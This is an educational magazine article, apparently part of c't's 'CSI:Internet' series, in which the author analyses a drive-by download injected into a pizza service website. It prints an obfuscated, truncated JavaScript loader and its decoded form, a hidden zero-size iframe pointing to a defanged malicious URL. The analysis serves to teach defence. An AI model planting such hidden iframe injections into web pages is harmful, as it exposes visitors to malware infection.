The "CSI:Internet" series was originally published in c't magazine starting in issue 13/2010. For links to other articles in this series please refer to our CSI:Internet HQ page. The code fragments in this article may cause your anti-virus scanner to issue an alert. However, these are false alarms.
CSI:Internet
Episode 1: Alarm at the pizza service
by Thorsten Holz
As I'm selecting a pizza on the website of my favourite pizza service, my anti-virus scanner issues an alert: It claims to have found and removed a "trojan.backdoor". Let's see what's going on here.
I haven't really done anything on this computer today, and I usually keep it clean, too. So it's probably something to do with this web page I've just opened. So first of all, I take a look at the source code. If it really is an attack, the HTML code should contain some indication somewhere.
After a short search I do find something; there is a strange JavaScript segment at the end of the page:
<script>var c ='%25%33%43%69%66%72%61%6d%65[ ... ]%25%33%45';
var d=unescape(unescape(c));
document.write(unescape(d));
</script>
That does look a lot like rubbish. Essentially, it repeatedly sends a long sequence of percent-encoded hexadecimal characters through the unescape() JavaScript function and then uses document.write to write the result directly into the web page that is being displayed in the browser. A typical drive-by download scenario!
So how can a web page shift a trojan to my system just like that? I didn't click on anything. To understand what's happening, I somehow have to get my hands on the plain text code. On a test system, I would now save the page and simply replace the write command with an alert(). The browser would then conveniently display the decoded text in a pop-up window. However, this is my private computer, and I don't want to risk it. Who knows what else this guy has in store (if it really is a guy).
Therefore, I choose the slightly more involved but safer way and use SpiderMonkey to execute the code. My first attempt at feeding the script segment to Mozilla's JavaScript engine as a text file results in an error message, "ReferenceError: document is not defined". That's not surprising, because the document object is only defined within the browser context. After I've replaced document.write() with a simple print(), however, the code works fine:
$ js 1.js
<iframe src="hxxp://tissot333.cn/eleonore/index.php"
width="0" height="0" frameborder="0">
</iframe>
Looks like somebody injected an iFrame with a reference to another web page into the website of my favourite pizza service. They probably exploited a vulnerability in the web software used and added the code via a method such as SQL injection. A value of zero for the height and width of the embedded iFrame makes the iFrame as good as invisible – I'm smelling a rat.